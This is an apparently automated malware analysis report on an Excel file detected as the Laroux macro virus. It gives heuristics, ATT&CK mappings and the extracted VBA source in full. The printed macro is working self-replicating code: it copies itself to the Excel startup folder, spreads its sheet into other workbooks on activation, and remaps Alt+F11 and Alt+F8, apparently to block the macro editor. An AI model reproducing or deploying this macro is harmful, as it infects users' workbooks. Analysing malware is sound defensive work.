MALICIOUS
88
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The critical ClamAV heuristic and the presence of VBA macros indicate malicious intent. The Auto_Open macro attempts to copy the workbook to the Excel startup path as 'StartUp.xls', likely to achieve persistence. The VBA script also attempts to set up sheet activation and key handlers, further supporting the persistence goal.
Heuristics 3
-
ClamAV: Doc.Macro.Laroux-5893719-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Laroux-5893719-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub auto_open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 917 bytes |
SHA-256: ef12d7355755f09cb7ed5d43609aa9c78ce2121e9043188a92ffb406905a8ca9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "StartUp"
Sub auto_open()
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
Application.ScreenUpdating = False
ThisWorkbook.Sheets("StartUp").Copy
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
n$ = ActiveWorkbook.Name
ActiveWindow.Visible = False
Workbooks("StartUp.xls").Save
'Workbooks(n$).Close (False)
End If
Application.OnSheetActivate = "StartUp.xls!ycop"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub
Sub ycop()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
Application.ScreenUpdating = False
n$ = ActiveSheet.Name
Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.